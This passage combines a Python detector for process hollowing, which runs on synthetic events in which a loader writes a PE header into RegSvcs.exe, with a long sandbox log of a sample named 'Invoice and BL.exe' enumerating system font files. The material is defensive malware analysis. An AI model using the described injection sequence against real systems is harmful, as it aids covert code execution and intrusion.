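        elif ev["type"] == "write":
            tgt = procs.get(ev["target_pid"])
            if tgt is None:            # target not tracked: nothing to say
                continue
            tgt.writes.append((ev["base"], ev["data"][:2]))
            if ev["pid"] == ev["target_pid"]:
                continue               # a process writing its own memory is normal
            if ev["data"][:2] == MZ:
                who = "its parent" if ev["pid"] == tgt.parent_pid else f"pid {ev['pid']}"
                findings.append((ev["target_pid"], "hollowing",
                                 f"PE header (4D5A) written to {tgt.image} at 0x{ev['base']:X} by {who}"))
            else:
                findings.append((ev["target_pid"], "foreign-write",
                                 f"0x{len(ev['data']):X} bytes written to {tgt.image} at 0x{ev['base']:X}"))
    return findings


def sample_events():
    """Constructed event stream mirroring the report. PID 1152 is the loader's PID from the
    report; child PID 2484 and the section bytes are invented for the example."""
    parent, child = 1152, 2484
    regsvcs = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    pe_header = b"MZ\x90\x00\x03\x00\x00\x00"      # starts with 4D5A as in the report
    section = b"\x55\x8b\xec\x83\xec\x10"           # stand-in section bytes
    return [
        {"type": "create", "pid": child, "ppid": parent, "image": regsvcs, "suspended": True},
        {"type": "write", "pid": parent, "target_pid": child, "base": 0x400000, "data": pe_header},
        {"type": "write", "pid": parent, "target_pid": child, "base": 0x401000, "data": section},
        {"type": "write", "pid": parent, "target_pid": child, "base": 0x415000, "data": section},
        {"type": "write", "pid": parent, "target_pid": child, "base": 0x41A000, "data": section},
        {"type": "write", "pid": parent, "target_pid": child, "base": 0x4A0000, "data": section},
        # The report lists a write at 0xBA2008 but not its content; this payload is assumed.
        {"type": "write", "pid": parent, "target_pid": child, "base": 0xBA2008, "data": section},
        # Benign control: the child writing its own memory must not be reported.
        {"type": "write", "pid": child, "target_pid": child, "base": 0x500000, "data": section},
    ]


if __name__ == "__main__":
    for pid, verdict, detail in analyze(sample_events()):
        print(f"[{verdict:13}] pid {pid}: {detail}")
```

On a live host the same logic maps onto Sysmon Event ID 10 (ProcessAccess with PROCESS_VM_WRITE and PROCESS_VM_OPERATION in GrantedAccess) paired with Event ID 1 for the child; the MZ-at-image-base test needs the written buffer, which an EDR or the sandbox provides and Sysmon does not.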
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Users\user\Desktop\Invoice and BL.exe VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
